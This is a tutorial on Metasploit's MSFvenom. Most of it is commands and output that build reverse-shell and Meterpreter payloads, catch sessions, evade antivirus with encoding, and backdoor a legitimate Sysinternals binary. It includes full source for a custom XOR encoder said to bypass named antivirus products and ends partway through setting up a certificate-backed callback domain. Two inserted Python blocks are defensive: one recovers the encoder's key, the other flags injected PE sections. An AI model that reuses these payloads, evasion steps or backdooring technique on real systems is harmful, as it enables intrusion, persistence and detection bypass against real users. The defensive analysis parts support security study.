
Metasploit Penetration Testing: MSFvenom

Introduction

By now you should be familiar with MSFvenom, since it has come up several times in earlier articles. MSFvenom is the tool used to generate payloads and encode them. It evolved from msfpayload and msfencode and replaced both on June 8, 2015.

In this article we look more closely at the available payloads, see why encoders are useful for evading security detection, review the available executable formats, look at the transform output formats, and more.

#1. Payloads and Payload Options

A look at the available payloads shows that MSFvenom is one of the most versatile and useful payload generators around; the list demonstrates that MSFvenom can help you obtain a session in almost any situation.

To start experimenting with msfvenom, open a terminal and run msfvenom -h or msfvenom --help to display the help menu.

# msfvenom -h                                           
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message
           

1. To list all available payloads, use msfvenom -l payloads

# msfvenom -l payloads

Framework Payloads (968 total) [--payload <value>]
==================================================

    Name                                                               Description
    ----                                                               -----------
    aix/ppc/shell_bind_tcp                                             Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                                            Spawn a shell on an established connection
    aix/ppc/shell_interact                                             Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                                          Connect back to attacker and spawn a command shell
..... (truncated)
           

2. Generating a payload requires at least two options, -p and -f: -p selects which of the available payloads to generate, and -f specifies the output format.

msfvenom -p cmd/unix/bind_awk -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 140 bytes
awk 'BEGIN{s="/inet/tcp/4444/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
           

3. To list all supported output format types, use --list formats

msfvenom --list formats  

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
.... (truncated)
Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
.... (truncated)
           

msfvenom supports two kinds of output format: executable formats and transform formats. Executable formats produce programs and scripts, whereas transform formats produce only the payload bytes themselves.

4. We can also pass - or stdin to -p to supply a custom payload, which is very useful when bypassing security detection:

cat payload_file.bin | msfvenom -p - -a x86 --platform linux -e x86/shikata_ga_nai -f elf -o custom.elf
           

When generating a payload, use -a to specify the hardware architecture (x86/x64/arm), --platform to specify the payload's target platform, and -o to save the payload to a file.

5. Use msfvenom --list platforms to list the supported platforms

msfvenom --list platforms

Framework Platforms [--platform <value>]
========================================

    Name
    ----
    aix
    android
    apple_ios
    arista
    brocade
    bsd
    bsdi
    cisco
    firefox
    freebsd
    hardware
    hpux
    irix
    java
    javascript
    juniper
    linux
    mainframe
    mikrotik
    multi
    netbsd
    netware
    nodejs
    openbsd
    osx
    php
    python
    r
    ruby
    solaris
    unifi
    unix
    unknown
    windows
           

6. A very useful option during exploitation is --smallest, which generates the smallest possible payload.

msfvenom -p linux/x64/shell_bind_tcp -f elf --smallest -o small.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 86 bytes
Final size of elf file: 206 bytes
Saved as: small.elf
           

7. Now that we know how to create a basic bind shell, we will try to create a reverse shell. First, check the options available for the chosen payload with --list-options:

# msfvenom -p linux/x64/shell_reverse_tcp --list-options
Options for payload/linux/x64/shell_reverse_tcp:
=========================


       Name: Linux Command Shell, Reverse TCP Inline
     Module: payload/linux/x64/shell_reverse_tcp
   Platform: Linux
       Arch: x64
Needs Admin: No
 Total size: 74
       Rank: Normal

Provided by:
    ricky

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell



Advanced options for payload/linux/x64/shell_reverse_tcp:
=========================

    Name                        Current Setting  Required  Description
    ----                        ---------------  --------  -----------
    AppendExit                  false            no        Append a stub that executes the exit(0) system call
    AutoRunScript                                no        A script to run automatically on session creation.
    AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
    CommandShellCleanupCommand                   no        A command to run before the session is closed
    CreateSession               true             no        Create a new session for every successful login
    InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
    PrependChrootBreak          false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
    PrependFork                 false            no        Prepend a stub that starts the payload in its own process via fork
    PrependSetgid               false            no        Prepend a stub that executes the setgid(0) system call
    PrependSetregid             false            no        Prepend a stub that executes the setregid(0, 0) system call
    PrependSetresgid            false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
    PrependSetresuid            false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
    PrependSetreuid             false            no        Prepend a stub that executes the setreuid(0, 0) system call
    PrependSetuid               false            no        Prepend a stub that executes the setuid(0) system call
    ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
    ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
    ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
    ReverseListenerComm                          no        The specific communication channel to use for this listener
    ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
    StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
    StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
    VERBOSE                     false            no        Enable detailed status messages
    WORKSPACE                                    no        Specify the workspace for this module

Evasion options for payload/linux/x64/shell_reverse_tcp:
=========================

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
           

8. There are a great many options, but for now we only need the basic ones, namely the listen address and the listen port. Use LHOST to set the listen IP address and LPORT to set the listen port.

# msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.91.128 LPORT=1234 -f elf -o reverse.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: reverse.elf
           

9. To test our payload, we use the generic payload handler exploit module to set up our listener on port 1234 in Metasploit:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.91.128
LHOST => 192.168.91.128
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.91.128:1234 
           

10. Run the generated payload

# chmod +x reverse.elf     
# ./reverse.elf 

           

11. As expected, we get a session.

[*] Started reverse TCP handler on 192.168.91.128:1234 
[*] Sending stage (38 bytes) to 192.168.91.128
[*] Command shell session 13 opened (192.168.91.128:1234 -> 192.168.91.128:60886) at 2023-04-18 13:25:40 +0800

id
uid=0(root) gid=0(root) groups=0(root)
           

12. Creating a payload for a Windows target is just as simple; all we need to do is specify the architecture, the target platform, the payload to run on the target, the listener settings, and the output format and file name:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -o payload.exe
           

13. Then set up the listener in msfconsole and transfer the generated payload.exe to the Windows target to run it. Barring surprises, a new session arrives.

msf6 > handler -p windows/meterpreter/reverse_tcp -H 192.168.91.128 -P 7777
[*] Payload handler running as background job 11.

[*] Started reverse TCP handler on 192.168.91.128:7777 
msf6 > 
[*] Started reverse TCP handler on 192.168.91.128:7777 
[*] Sending stage (179779 bytes) to 192.168.91.133
[*] Meterpreter session 1 opened (192.168.91.128:7777  -> 192.168.91.133:55489)  at 2023-04-18 13:30:40 +0800
meterpreter > 

           

By specifying an additional win32 shellcode file with -c or --add-code, we can combine multiple payloads into one.

14. First, create a simple payload with windows/messagebox that pops up a message on the target:

msfvenom -a x86 --platform windows -p windows/messagebox TEXT="First Payload" -f raw > First_Payload
           

15. Then use the -c option to add our first payload to a second one:

msfvenom -c First_Payload -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -o multi.exe
           
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="First Payload" -f raw > First_Payload
No encoder specified, outputting raw payload
Payload size: 267 bytes
# msfvenom -c First_Payload -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -o multi.exe
Adding shellcode from First_Payload to the payload
No encoder specified, outputting raw payload
Payload size: 938 bytes
Final size of exe file: 73802 bytes
Saved as: multi.exe

           

16. When we execute the payload on the target, a message box pops up on the target machine and a new session is returned.


#2. Encoders

Generating a payload is only the first step; these days security products such as intrusion detection systems (IDS), antivirus and anti-malware easily recognise shellcode generated by MSFvenom. To help evade detection, we can use encoders to encode our shellcode.

1. We can view all encoders in the Metasploit Framework with the show encoders command in msfconsole, or by browsing the /usr/share/metasploit-framework/modules/encoders/ directory on a Kali Linux machine:

msf6 > show encoders 

Encoders
========

   #   Name                                  Disclosure Date  Rank       Check  Description
   -   ----                                  ---------------  ----       -----  -----------
   0   encoder/cmd/brace                                      low        No     Bash Brace Expansion Command Encoder
   1   encoder/cmd/echo                                       good       No     Echo Command Encoder
   2   encoder/cmd/generic_sh                                 manual     No     Generic Shell Variable Substitution Command Encoder
.... (truncated)
# ls /usr/share/metasploit-framework/modules/encoders/
cmd  generic  mipsbe  mipsle  php  ppc  ruby  sparc  x64  x86                                        
           

2. To encode a payload, we simply add the -e option followed by the encoder to use, and -i to specify how many times to encode the payload:

# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -e x86/shikata_ga_nai -i 10 -o encoded.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 73802 bytes
Saved as: encoded.exe
           

3. To check whether the generated payload is detected by antivirus software, we can submit it to VirusTotal:


Unfortunately, as expected, even after encoding it 10 times it is still detected by most antivirus products. Over time, almost every default encoder in Metasploit has become detectable by security software. That does not mean the approach is dead; with a custom encoder we can still use Metasploit to get past security products.

4、我們将使用由 François Profizi 建立的自定義編碼器,它使用對已知明文的暴力攻擊來繞過安全産品.

# -*- coding: binary -*-
# (The magic comment above is standard in Metasploit modules: it makes the
#  "\x.." literals and the pack() output below plain byte strings, so they
#  concatenate without encoding errors.)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Class name kept as posted; current Metasploit modules are named MetasploitModule.
class Metasploit3 < Msf::Encoder

  def initialize
    super(
      'Name'        => 'bf_xor',
      'Description' => '',
      'Author'      => 'François Profizi',
      'Arch'        => ARCH_X86,
      'License'     => MSF_LICENSE
    )
  end

  # Decoder prepended to the encoded payload. The stub carries no key: at run
  # time it brute-forces the 32-bit XOR key, testing each candidate against the
  # 10 known plaintext bytes appended after the machine code.
  def decoder_stub(state)
    stub = ""

    stub << "\xEB\x62\x55\x8B\xEC\x83\xEC\x18\x8B\x7D\x10\x8B\x75\x0C\x33\xC0\x89\x45\xFC\x8B"
    stub << "\xC8\x83\xE1\x03\x03\xC9\x03\xC9\x03\xC9\x8B\xDA\xD3\xFB\x8A\xCB\x33\xDB\x39\x5D"
    stub << "\x14\x75\x18\x0F\xB6\x1E\x0F\xB6\xC9\x33\xD9\x8B\x4D\x08\x0F\xB6\x0C\x08\x3B\xD9"
    stub << "\x75\x07\xFF\x45\xFC\xEB\x02\x30\x0E\x40\x46\x3B\xC7\x7C\xC8\x3B\x7D\xFC\x74\x10"
    stub << "\x83\x7D\x14\x01\x74\x06\x42\x83\xFA\xFF\x72\xAF\x33\xC0\xEB\x02\x8B\xC2\xC9\xC3"
    stub << "\x55\x8B\xEC\x83\xEC\x10\xEB\x50\x58\x89\x45\xFC\xEB\x37\x58\x8B\x10\x89\x55\xF8"
    stub << "\x83\xC0\x04\x89\x45\xF4\x33\xDB\x33\xC0\x50\x6A\x0A\xFF\x75\xFC\xFF\x75\xF4\xE8"
    stub << "\x72\xFF\xFF\xFF\x85\xC0\x74\x13\x6A\x01\xFF\x75\xF8\xFF\x75\xFC\xFF\x75\xF4\xE8"
    stub << "\x5E\xFF\xFF\xFF\xFF\x65\xFC\xC9\xC3\xE8\xC4\xFF\xFF\xFF"

    stub << [state.buf.length].pack("L")  # payload size (32-bit little-endian)
    stub << state.buf[0,10]               # known plaintext: first 10 payload bytes

    stub << "\xE8\xAB\xFF\xFF\xFF"        # call back into the stub code
    return stub
  end

  # XOR every payload byte with a repeating 4-byte little-endian key chosen at random.
  def encode_block(state, block)
    key = rand(4294967295)
    encoded = ""
    key_tab = [key].pack('L<')
    i = 0

    block.unpack('C*').each do |ch|
      octet = key_tab[i % 4]
      t = ch.ord ^ octet.ord
      encoded += t.chr
      i += 1
    end
    return encoded
  end
end

将其放置到/usr/share/metasploit-framework/modules/encoders/x86目錄,并儲存為bf_xor.rb。

5. Then encode our payload with this encoder

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe-only -e x86/bf_xor -o bf_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/bf_xor
x86/bf_xor succeeded with size 547 (iteration=0)
x86/bf_xor chosen with final size 547
Payload size: 547 bytes
Final size of exe-only file: 73802 bytes
Saved as: bf_xor.exe
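An added analyst-side example (not from the original post or from the bf_xor module) showing why this encoder is obfuscation rather than encryption: the stub has to brute-force the 32-bit key, but anyone holding the output recovers it instantly, because the ten known plaintext bytes the stub appends are XORed against the first ten encoded bytes. The stub body, dummy payload and key used below are constructed placeholders; only the trailer layout (length, 10 known bytes, the final E8 AB FF FF FF call) follows the Ruby module above.

```python
import struct
from typing import Optional, Tuple

# From bf_xor.rb: decoder_stub ends with this 5-byte call and, just before it,
# appends [state.buf.length].pack("L") and state.buf[0,10].
STUB_TRAILER_CALL = b"\xE8\xAB\xFF\xFF\xFF"
KNOWN_LEN = 10


def xor_encode(block: bytes, key: int) -> bytes:
    """Mirror of encode_block: XOR each byte with the repeating 4-byte
    little-endian key ([key].pack('L<')). XOR is its own inverse, so the
    same function decodes."""
    key_tab = struct.pack("<L", key)
    return bytes(b ^ key_tab[i % 4] for i, b in enumerate(block))


def build_blob(stub_body: bytes, payload: bytes, key: int) -> bytes:
    """Assemble what msfvenom emits for this encoder: decoder_stub(state)
    followed by encode_block(state, payload). stub_body is a stand-in for the
    hand-written machine code at the start of the real stub."""
    if len(payload) < KNOWN_LEN:
        raise ValueError("payload shorter than the 10-byte known prefix")
    return (stub_body
            + struct.pack("<L", len(payload))   # size payload
            + payload[:KNOWN_LEN]                # state.buf[0,10]
            + STUB_TRAILER_CALL
            + xor_encode(payload, key))


def recover_key(encoded: bytes, known: bytes) -> Optional[int]:
    """No 2^32 search is needed on the analyst's side: key byte i is simply
    ciphertext[i] XOR plaintext[i]. The remaining known bytes verify that
    this really is the right split point."""
    if len(known) < 4 or len(encoded) < len(known):
        return None
    key_tab = bytes(encoded[i] ^ known[i] for i in range(4))
    for i in range(4, len(known)):
        if encoded[i] ^ key_tab[i % 4] != known[i]:
            return None
    return struct.unpack("<L", key_tab)[0]


def carve_and_decode(blob: bytes) -> Optional[Tuple[int, bytes]]:
    """Locate the stub trailer, recover the key and return (key, plaintext).
    The stub code contains other E8 xx FF FF FF calls and the ciphertext may
    contain the pattern by chance, so every occurrence is tried and accepted
    only if the length field and the known-prefix check both agree."""
    start = 0
    while True:
        pos = blob.find(STUB_TRAILER_CALL, start)
        if pos < 0:
            return None
        hdr = pos - KNOWN_LEN - 4
        if hdr >= 0:
            (length,) = struct.unpack_from("<L", blob, hdr)
            known = blob[hdr + 4:pos]
            encoded = blob[pos + len(STUB_TRAILER_CALL):]
            if length == len(encoded):
                key = recover_key(encoded, known)
                if key is not None:
                    return key, xor_encode(encoded, key)
        start = pos + 1


# Constructed sample data: a dummy stub body and a printable dummy "payload"
# (not shellcode), plus an arbitrary key.
SAMPLE_STUB_BODY = b"\xEB\x62" + b"\x90" * 30 + b"\xE8\xC4\xFF\xFF\xFF"
SAMPLE_PAYLOAD = bytes(range(0x20, 0x7F)) * 3
SAMPLE_KEY = 0xDEADBEEF

if __name__ == "__main__":
    blob = build_blob(SAMPLE_STUB_BODY, SAMPLE_PAYLOAD, SAMPLE_KEY)
    key, plain = carve_and_decode(blob)
    print(f"recovered key 0x{key:08X}, payload intact: {plain == SAMPLE_PAYLOAD}")
```

The same property is what lets a sandbox or emulator that runs the stub to completion see the decoded payload; the encoder only buys time against static signatures and emulators with a short execution budget.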
           

#Other

When testing payloads, we should not use online scanners such as VirusTotal. They share samples with antivirus vendors and security companies so that those vendors can improve their services and products. That is why, when testing your payload, you should do proper reconnaissance of your target, identify the security solution it uses, install that product in a virtual machine with client telemetry submission disabled, and test your payload there. Here, taking Huorong and 360 Total Security as examples, the custom bf_xor encoder successfully bypassed their detection:


#3. Output Formats

Now that we have learned the basics of msfvenom, let us explore some of the available output formats. At the start of this chapter we listed all available output formats with --list formats; now we focus on a few of the different types and options.

Let us start with the dll output format and how to use it. DLL stands for Dynamic Link Library, Microsoft's implementation of the shared library concept, meaning they are libraries of functions that can be imported into applications.

1. First, generate a payload in dll output format and set up the listener.

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.91.128 LPORT=7777 -f dll -o inject.dll
[*] exec:  msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.91.128 LPORT=7777 -f dll -o inject.dll

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 643 bytes
Final size of dll file: 9216 bytes
Saved as: inject.dll
msf6 > handler -p windows/meterpreter/reverse_https -H 192.168.91.128 -P 7777
[*] Payload handler running as background job 13.
msf6 > 
           

2. Unlike an executable, we need another application to load our DLL payload. In this example we use rundll32.exe to load the DLL and run our shellcode. To load the DLL, run rundll32.exe followed by the DLL we created and the entry point name main:

msf6 > 
[*] Started HTTPS reverse handler on https://192.168.91.128:7777
[!] https://192.168.91.128:7777 handling request from 192.168.91.133; (UUID: fry53rqp) Without a database connected that payload UUID tracking will not work!
[*] https://192.168.91.128:7777 handling request from 192.168.91.133; (UUID: fry53rqp) Staging x86 payload (176732 bytes) ...
[!] https://192.168.91.128:7777 handling request from 192.168.91.133; (UUID: fry53rqp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 17 opened (192.168.91.128:7777 -> 192.168.91.133:57240) at 2023-04-18 14:57:45 +0800
msf6 > 
           

As expected, we get a new session from the DLL payload.

MSFvenom can help us create stealthier payloads, use advanced shells such as meterpreter, and apply encoders when performing web application penetration tests.

3. To create a PHP Meterpreter payload with Base64 encoding, use the following command:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f raw -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1510 (iteration=0)
php/base64 chosen with final size 1510
Payload size: 1510 bytes
eval(base64_decode(<base64-encoded PHP payload omitted>));
           

4. Set up the listener and test execution in PHP.

msf6 > handler -p php/meterpreter/reverse_tcp -H 192.168.91.128 -P 7777                                                              
[*] Payload handler running as background job 1.            
           

5. Run it in the PHP interactive shell to obtain a new session

root@osboxes:~# php -a
Interactive mode enabled

php > eval(base64_decode(<base64-encoded PHP payload from step 3, omitted>));
           
msf6 > 
[*] Sending stage (39927 bytes) to 192.168.91.136
[*] Meterpreter session 33 opened (192.168.91.128:7777 -> 192.168.91.136:45948) at 2023-04-18 15:37:14 +0800
           

#4. Templates

Backdooring a known application can be a good way to compromise a target, for example when you are already on the internal network and have gained access to an internal software repository. In addition, a custom template may bypass some security solutions that detect Metasploit payloads by their default templates.

By default MSFvenom uses the templates in the /usr/share/metasploit-framework/data/templates directory, but we can use our own template by specifying the template file with the -x option.

1. With -x we can specify a template; in this example we use Process Explorer from Windows Sysinternals as the template and, with -k, preserve the template's original behaviour and inject the payload as a new thread (see the -k description in the help output above):

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -x procexp.exe -k -f exe -o procexp-backdoored.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 7832576 bytes
Saved as: procexp-backdoored.exe
           

2. When the victim runs the payload, the original program runs normally and the backdoor runs alongside it as an additional thread of the original program.

[*] Sending stage (175686 bytes) to 192.168.91.133
[*] Meterpreter session 35 opened (192.168.91.128:7777 -> 192.168.91.133:50134) at 2023-04-18 16:32:46 +0800
           
Tip: when building an x64 payload with a custom x64 template, use exe-only as the output format rather than exe.
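An added defender-side example (not from the original post): a pure-Python walk of the PE section table that flags the traces a template injection like the one above tends to leave, a section that is both writable and executable and a section name no linker emits (the help text at the top shows msfvenom adding a new section with a random 4-letter name via --sec-name). The sample PE headers and the name "Gkqz" are constructed here, and it is an assumption that the injected section is marked writable+executable, which is why either indicator on its own is reported; for a signed binary such as procexp.exe the simplest first check remains that its Authenticode signature no longer verifies.

```python
import struct
from typing import Dict, List, Tuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Section names a linker normally emits; anything else deserves a look.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc",
                        ".idata", ".edata", ".pdata", ".bss", ".tls", ".CRT"}


def parse_sections(pe: bytes) -> List[Dict]:
    """Walk the PE section table using only the standard library."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (size_of_opt,) = struct.unpack_from("<H", pe, coff + 16)
    first = coff + 20 + size_of_opt      # section table follows the optional header
    sections = []
    for n in range(num_sections):
        off = first + 40 * n             # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        (chars,) = struct.unpack_from("<I", pe, off + 36)
        sections.append({"name": name, "vsize": vsize, "vaddr": vaddr,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "chars": chars})
    return sections


def suspicious_sections(sections: List[Dict]) -> List[Tuple[str, List[str]]]:
    """Triage heuristic: a section that is both writable and executable, or
    whose name is not one a normal linker emits, is worth inspecting. Packers
    and some compilers also trip the name rule, so treat hits as leads."""
    hits = []
    for s in sections:
        reasons = []
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable+executable")
        if s["name"] not in COMMON_SECTION_NAMES:
            reasons.append("nonstandard name")
        if reasons:
            hits.append((s["name"], reasons))
    return hits


def build_sample_pe(section_specs: List[Tuple[bytes, int]]) -> bytes:
    """Construct a minimal, header-only 32-bit PE for the demonstration (not a
    runnable program): DOS header, PE signature, COFF header, a zeroed
    optional header and the requested section headers."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, 0xE0, 0x0102)
    optional = bytes(0xE0)
    table = b""
    for i, (name, chars) in enumerate(section_specs):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), 0x1000,
                             0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i,
                             0, 0, 0, 0, chars)
    return bytes(dos) + b"PE\0\0" + coff + optional + table


# Constructed section layouts: a typical clean binary, and the same binary with
# an extra randomly named section carrying code + read + write + execute flags.
CLEAN_SPECS = [(b".text", 0x60000020), (b".rdata", 0x40000040), (b".data", 0xC0000040)]
INJECTED_SPECS = CLEAN_SPECS + [(b"Gkqz", 0xE0000020)]

if __name__ == "__main__":
    for label, specs in (("clean", CLEAN_SPECS), ("injected", INJECTED_SPECS)):
        print(label, suspicious_sections(parse_sections(build_sample_pe(specs))))
```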

#5. Meterpreter Payload with a Trusted Certificate

Most security solutions today also perform network intrusion detection by analysing the traffic entering and leaving the target machine. In that case, even if an encoder gets the payload past antivirus, it is likely to be caught and blocked when it tries to connect back to our listener.

First we need a cloud host and a domain name, and we obtain an SSL certificate from Let's Encrypt.

Start by setting the DNS record at your domain registrar so the domain points to the host (not shown here).

Tip: with mainland Chinese cloud hosting and domain providers, a domain will not resolve until ICP filing (备案) is completed; a Hong Kong or overseas cloud host and domain provider avoids this.

1. Install letsencrypt on the cloud server

apt install letsencrypt -y
           

2. Next, generate the certificate by running the letsencrypt command and following the prompts

letsencrypt certonly --manual -d gpt5.onl
           
root@iZj6ccx9c36agbjm7ekf9mZ:~# letsencrypt certonly --manual -d gpt5.onl
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Enter email address (used for urgent renewal and security notices)
 (Enter 'c' to cancel): <your e-mail address>   // enter your e-mail address

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Please read the Terms of Service at
https://letsencrypt.org/documents/LE-SA-v1.3-September-21-2022.pdf. You must
agree in order to register with the ACME server. Do you agree?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(Y)es/(N)o: Y   // agree to the terms, enter Y

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Would you be willing, once your first certificate is successfully issued, to
share your email address with the Electronic Frontier Foundation, a founding
partner of the Let's Encrypt project and the non-profit organization that
develops Certbot? We'd like to send you email about our work encrypting the web,
EFF news, campaigns, and ways to support digital freedom.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(Y)es/(N)o: N   // share your e-mail address? choose N
Account registered.
Requesting a certificate for gpt5.onl

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Create a file containing just this data:

T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss.a7_kMa1Et_Zx_p1td4C3YkGUV2qWL7zEYzWZQvki65c

And make it available on your web server at this URL:

http://gpt5.onl/.well-known/acme-challenge/T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Press Enter to Continue   // create the file with the content shown above, then press Enter

Successfully received certificate.
Certificate is saved at: /etc/letsencrypt/live/gpt5.onl/fullchain.pem
Key is saved at:         /etc/letsencrypt/live/gpt5.onl/privkey.pem
This certificate expires on 2023-07-18.
These files will be updated when the certificate renews.

NEXT STEPS:
